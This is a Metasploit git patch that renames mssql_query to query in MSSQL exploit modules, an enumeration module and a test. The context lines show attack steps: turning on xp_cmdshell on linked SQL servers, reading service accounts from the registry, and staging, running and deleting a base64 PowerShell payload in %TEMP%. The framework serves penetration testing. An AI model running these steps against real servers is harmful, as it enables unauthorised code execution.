From efb5077ca6d019543931a242608dc2aa62c888d7 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Mon, 12 Feb 2024 10:27:11 +0000 Subject: [PATCH] Rename more mssql_query calls & fix AutoRunScript for MSSQL --- lib/rex/post/mssql/ui/console.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum.rb | 10 +++---- .../mssql/ms09_004_sp_replwritetovarbin.rb | 10 +++---- .../ms09_004_sp_replwritetovarbin_sqli.rb | 6 ++--- .../windows/mssql/mssql_linkcrawler.rb | 26 +++++++++---------- .../exploits/windows/mssql/mssql_payload.rb | 2 +- spec/lib/msf/base/sessions/mssql_spec.rb | 2 +- 7 files changed, 29 insertions(+), 29 deletions(-) diff --git a/lib/rex/post/mssql/ui/console.rb b/lib/rex/post/mssql/ui/console.rb index ef7482c463d11..c1db4e7022b57 100644 --- a/lib/rex/post/mssql/ui/console.rb +++ b/lib/rex/post/mssql/ui/console.rb @@ -28,7 +28,7 @@ def initialize(session, opts={}) # The mssql client context self.session = session self.client = session.client - self.cwd = session.client.mssql_query('SELECT DB_NAME();')[:rows][0][0] + self.cwd = session.client.query('SELECT DB_NAME();')[:rows][0][0] prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{cwd})%clr" history_manager = Msf::Config.mssql_session_history super(prompt, '>', history_manager, nil, :mssql) diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index a605913dc6363..e2231c59d3ee2 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -706,7 +706,7 @@ def run SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P') AND SYSOBJECTS.ID = SYSPROTECTS.ID EOS - fountsp = mssql_query(query)[:rows] + fountsp = query(query)[:rows] if fountsp != nil fountsp.flatten! print_status("Stored Procedures with Public Execute Permission found:") @@ -734,7 +734,7 @@ def run instances =[] if vernum.join != "2000" querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'" - instance_res = mssql_query(querykey)[:rows] + instance_res = query(querykey)[:rows] if instance_res != nil instance_res.each do |i| instances << i[0] @@ -742,7 +742,7 @@ def run end else querykey = "exec xp_regread \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\', \'InstalledInstances\'" - instance_res = mssql_query(querykey)[:rows] + instance_res = query(querykey)[:rows] if instance_res != nil instance_res.each do |i| instances << i[1] @@ -769,7 +769,7 @@ def run #--------------------------------------------------------- # Enumerate under what accounts the instance services are running under print_status("Default Server Instance SQL Server Service is running under the privilege of:") - privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows] + privdflt = query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows] if privdflt != nil privdflt.each do |priv| print_status("\t#{priv[1]}") @@ -787,7 +787,7 @@ def run if instancenames.length > 1 instancenames.each do |i| if i.strip != "MSSQLSERVER" - privinst = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQL$#{i.strip}\',\'ObjectName\'")[:rows] + privinst = query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQL$#{i.strip}\',\'ObjectName\'")[:rows] if privinst != nil print_status("Instance #{i} SQL Server Service is running under the privilege of:") privinst.each do |p| diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 8338a28255092..82f4dcc6832c7 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -254,7 +254,7 @@ def check # since we need to have credentials for this vuln, we just login and run a query # to get the version information - if not (version = mssql_query_version()) + if not (version = query_version()) return Exploit::CheckCode::Safe end print_status("@@version returned:\n\t" + version) @@ -277,7 +277,7 @@ def exploit if target.name =~ /Automatic/ print_status("Attempting automatic target detection...") - version = mssql_query_version + version = query_version fail_with(Failure::NoAccess, "Unable to retrieve version information") if not version if (version =~ /8\.00\.194/) @@ -379,7 +379,7 @@ def exploit fail_with(Failure::NoAccess, "Unable to log in!") end begin - mssql_query(runme, datastore['VERBOSE']) + query(runme, datastore['VERBOSE']) rescue ::Errno::ECONNRESET, EOFError print_error("Error: #{$!}") end @@ -443,7 +443,7 @@ def mssql_encode_string(str) end - def mssql_query_version + def query_version begin logged_in = mssql_login_datastore rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR @@ -453,7 +453,7 @@ def mssql_query_version if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end - res = mssql_query("select @@version", datastore['VERBOSE']) + res = query("select @@version", datastore['VERBOSE']) disconnect return nil if not res diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index d2d5843b5898c..ca44f5d5260f4 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -256,7 +256,7 @@ def check # since we need to have credentials for this vuln, we just login and run a query # to get the version information - version = mssql_query_version + version = query_version unless version return Exploit::CheckCode::Safe end @@ -280,7 +280,7 @@ def exploit if target.name =~ /Automatic/ print_status("Attempting automatic target detection...") - version = mssql_query_version + version = query_version fail_with(Failure::NoAccess, "Unable to get version!") if not version if (version =~ /8\.00\.194/) @@ -444,7 +444,7 @@ def mssql_encode_string(str) end - def mssql_query_version + def query_version delay = 5 diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 77d9fb6e8c968..9489327cf3b16 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -169,7 +169,7 @@ def exploit # Get configuration information from the linked server sql = query_builder(temppath,"",0,versionQuery) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists if result[:errors].empty? and result[:rows] != nil then @@ -390,13 +390,13 @@ def enable_xp_cmdshell(path,name,shelled) # Check if "show advanced options" is enabled execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore saoOrig = result[:rows].pop.pop # Check if "xp_cmdshell" is enabled execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore xpcmdOrig = result[:rows].pop.pop # Try blindly to enable "xp_cmdshell" on the linked server @@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled) # Enabling show advanced options and xp_cmdshell execute = "sp_configure 'show advanced options',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end # Enabling xp_cmdshell print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable") execute = "sp_configure 'xp_cmdshell',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.) execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore xpcmdNow = result[:rows].pop.pop if xpcmdNow == 1 or xpcmdOrig == 1 @@ -460,12 +460,12 @@ def enable_xp_cmdshell(path,name,shelled) print_status("\t - Disabling xp_cmdshell on " + name) execute = "sp_configure 'xp_cmdshell',0;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end if saoOrig == 0 and xpcmdNow == 1 execute = "sp_configure 'show advanced options',0;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end end @@ -510,19 +510,19 @@ def powershell_upload_exec(path) mytext_64.scan(/.{1,2500}/).each {|part| execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore linenum = linenum+1 } # Remove duplicate lines from temp file and write to new file execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Remove tracking tags from lines execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors # If running on 64bit system, 32bit powershell called from syswow64 @@ -538,10 +538,10 @@ def powershell_upload_exec(path) # Execute the playload print_status("Executing payload...") - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Remove payload data from the target server execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql,false) + result = query(sql,false) end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index cc3226876d6a0..df2d89c4df100 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -73,7 +73,7 @@ def check return Exploit::CheckCode::Detected end - mssql_query("select @@version", true) + query("select @@version", true) if mssql_is_sysadmin vprint_good "User #{datastore['USERNAME']} is a sysadmin" Exploit::CheckCode::Vulnerable diff --git a/spec/lib/msf/base/sessions/mssql_spec.rb b/spec/lib/msf/base/sessions/mssql_spec.rb index 3797813c35570..f4bb20c1df6ac 100644 --- a/spec/lib/msf/base/sessions/mssql_spec.rb +++ b/spec/lib/msf/base/sessions/mssql_spec.rb @@ -31,7 +31,7 @@ allow(user_input).to receive(:intrinsic_shell?).and_return(true) allow(user_input).to receive(:output=) allow(client).to receive(:sock).and_return(rstream) - allow(client).to receive(:mssql_query).and_return(query_result) + allow(client).to receive(:query).and_return(query_result) allow(rstream).to receive(:peerinfo).and_return(peer_info) end